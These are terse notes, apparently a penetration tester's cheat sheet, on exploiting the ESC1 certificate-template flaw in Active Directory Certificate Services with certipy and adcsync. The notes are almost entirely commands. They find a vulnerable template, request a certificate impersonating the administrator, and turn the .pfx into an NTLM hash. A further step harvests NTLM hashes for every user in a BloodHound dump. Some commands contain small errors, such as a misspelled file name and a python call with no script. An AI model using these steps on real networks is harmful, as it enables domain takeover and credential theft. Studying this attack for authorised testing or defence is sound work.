adcsync certify + ESC1 very, very, very noisy installation certipy usage (certipy way) # find a vulnerable template $ certipy find -u username -p password target-ip ip # import into bloodhound # look at _Certipy.txt - check if there's an ESC1 vulnerability # exploit ESC1 $ certipy req -u [email protected] -p password -ca TargetCA -target -template ESC1 -upn [email protected] -dc-ip ip # take administrator.pfx and create a hash $ certipy auth -pfx adminsitrator.pfx -dc-ip ip # note NTLM hash! usage (with adcsync) performs the same in an automated way to emulate adcsync # create a bloodhound dump, extract user-data and get _users.json # fix users.json: convert from utf8 to ascii $ iconv -f utf-8 -t ascii//TRANSLIT user1.json user.json $ python -u user -p password -ca CA -template ESC1 -target ip -f users.json -o ntlm.txt references Cyber Attack & Defense